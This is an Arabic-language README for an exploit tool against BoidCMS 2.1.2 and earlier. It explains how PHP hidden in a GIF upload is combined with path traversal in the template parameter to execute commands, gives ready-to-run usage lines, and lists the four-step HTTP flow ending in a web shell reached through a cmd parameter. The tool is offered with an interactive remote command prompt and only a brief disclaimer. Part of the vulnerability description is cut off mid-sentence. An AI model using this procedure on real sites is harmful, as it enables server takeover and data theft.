
استغلال RCE في BoidCMS <= 2.1.2
تمكّن BoidCMS <= 2.1.2 مهاجمًا مُصادَقًا من تحقيق تنفيذ أوامر عن بُعد (RCE) من خلال الجمع بين نقطتي ضعف:
image/gif) دون التحقق من المحتوى الفعلي للملف، مما يسمح بتخزين كود PHP مضمّن داخل ملف GIF على الخادم.tpl يتحكم فيه المستخدم ويُحلّ نسبةً إلى دليل القوالب دون تعقيم، مما يتيح اجتياز المسار (مثل ../../media/shell.gif) لتوجيه قالب الصفحة إلى الملف المرفوع.عند عرض الصفحة المُعدّة، ينفّذ مفسّر PHP الحمولة المضمّنة.
| الحقل | القيمة |
|---|---|
| البرنامج | BoidCMS |
| الإصدارات | <= 2.1.2 |
| CVE | CVE-2026-39387 |
python3 CVE-2026-39387.py -u <target_url> -l <username> -p <password>
python3 CVE-2026-39387.py -u http://target.com -l admin -p password123
بمجرد اكتمال الاستغلال، يتم توفير موجه أوامر تفاعلي (cmd >>) لتنفيذ الأوامر على المضيف البعيد.
1. Login → POST /admin (with CSRF token)
2. Upload shell → POST /admin?page=media (shell.gif containing PHP payload)
3. Create page → POST /admin?page=create (tpl=../../media/shell.gif)
4. Execute shell → GET /<permalink>?cmd=<command>
pip install requests
هذا الاستغلال مقدَّم لأغراض تعليمية ولاختبارات الأمان المصرح بها فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يُعدّ غير قانوني وغير أخلاقي.
| العلامة | الوصف | مثال |
|---|
-u, --url | عنوان URL الأساسي لموقع BoidCMS المستهدف | http://target.com |
-l, --user | اسم مستخدم المسؤول | admin |
-p, --passwd | كلمة مرور المسؤول | password123 |